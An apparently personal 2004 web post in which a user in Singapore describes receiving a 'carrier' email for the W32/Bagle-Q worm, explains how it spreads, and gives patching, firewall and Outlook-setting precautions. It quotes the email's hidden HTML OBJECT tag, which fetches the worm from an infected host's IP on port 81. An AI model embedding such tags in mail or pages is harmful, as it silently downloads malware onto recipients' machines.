Operating System » MS Windows » Windows - Virus Protection » Viruses: Email-borne  » New variant of virus - 18 March 2004

This afternoon I receive this suspected virus bourne e-mail that escape the detection of my AV system (AVG DB402).

Received: from william.com ([203.125.76.253]) http://www.pagenation.com/sc/203.125.76.253 from Singapore broadband subscriber.

From: wn @ metatech .com.hk
Sent: 18 March, 2004 02:00 PM
Subject: RE: Text message

It looks like any ordinary message but it has the following body hidden script:

< OBJECT style="DISPLAY: none" data=http://211.181.1.68:81/536473.php >< /OBJECT >

Luckily, I had disable running of script from my outlook software, see tips below. And the message "Your current security settings prohibit running of ActiveX control on this page".

On further investigations, I found that this is indeed another new method of spreading the virus (W32/Bagle-Q).

According to Sophos:

It spreads via a "carrier" email that does not contain the virus as an attachment. When you open a "carrier" email, it attempts to exploit vulnerability in Outlook that automatically downloads W32/Bagle-Q from the PC that sent you the "carrier" email.

Using the ip lookup webtool, www.pagenation.com/sc/211.181.1.68 and found that this infected machine is located in Korea. And Also I did a ping test, and found that the machine responsed - I was lucky this time, if I had not disabled the running of script, this virus would have taken over my machine. Thank God!

The "carrier" email downloads using downloads W32/Bagle-Q via an HTTP (web) request to TCP port 81 on the sender’s PC. The downloaded copy of W32/Bagle-Q is placed into your system folder with the name directs.exe (W32/Bagle-Q) loads on your PC and terminates a wide range of security applications. It also makes multiple copies of itself into folders which are likely to be part of a file-sharing network, as well infecting programs on your PC by appending itself to existing EXE files (this is called "parasitic virus infection").

Here is some precautions against W32/Bagle-Q:

  • Get and apply the latest Internet Explorer/Outlook Express patches from Microsoft. This prevents the automatic download of the virus.
  • Disallow connections to TCP port 81 through your network firewall. Blocking outbound port 81 connections stops computers on your network from downloading the worm from outside. Blocking inbound port 81connections means that even if you do get infected you will not pass the virus on to others.

Tips for Setting Outlook:

Tools > Options

  • Security Tab
  • Download Pictures [ Change Automatic Download Settings ... ]
  • Check ON...
    • Don’t download pictures or other content automatically in HTML e-mail
    • Warn me before downloading content when editing, forwarding, or replying to e-mail

Additional info.

Another virus infected mail came in again. This time the zombie is located at http://pagenation.com/sc/24.224.236.131 - Canada. Interesting the sender is spoofed to our local domain (postbox at mac-net dot com). And the sender ip is http://pagenation.com/sc/203.125.64.148 Singapore (bb- 203- 125- 64- 148. singnet.com.sg local broadband subscriber) but it sender domain is title as com-o6vepdwwbxu.net.

I am getting really angry with all these virus writers. I hope the long arm of the law catches them and and punishes them severely.

Singapore, 22 March 2004.

Updated On: 12.07.11

Tagged By: Search: McAfee.

Leave your message, comment or feedback:
Your Name (shown) & Your E-mail (hidden) is used only to alert you when someone reply your message.